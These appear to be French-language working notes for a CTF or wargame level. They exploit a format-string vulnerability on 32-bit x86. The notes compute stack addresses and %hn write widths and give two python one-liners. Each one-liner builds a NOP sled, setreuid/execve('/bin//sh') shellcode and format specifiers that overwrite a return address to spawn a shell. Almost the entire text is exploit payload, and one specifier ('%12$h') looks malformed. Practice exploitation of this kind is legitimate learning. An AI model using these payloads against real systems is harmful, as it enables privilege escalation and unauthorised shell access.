rediriger le programme sur 0xbffff500

Adresse des NOP 0xbffff4fc = 
f500 = 62720 
bfff = 49151

eip = 0xbffff4dc : bffff4df bffff4de bffff4dd bffff4dc
x/x $esp = 0xbffff4c0 ->> bffff4c3 bffff4c2 bffff4b1 bffff4f0
X = 49151 - 8 - nops(34 ici) - 39(shellcode) = 49070
Y = 62720 - 49070(X) - 8 - nops(34 ici) - 39(shellcode) = 13569


Trouver le shellcode en memoire : python -c "print '\x41' * 4 + '\x90' * 34 + '\x6a\x31\x58\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80' + '%4$x'" > /tmp/level3


python -c 'print("\xc2\xf4\xff\xbf\xc0\xf4\xff\xbf" + "\x90"*30 + "\x6a\x31\x58\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" + "%49070d" + "%12$h" + "%13569d" "%13$hn")'
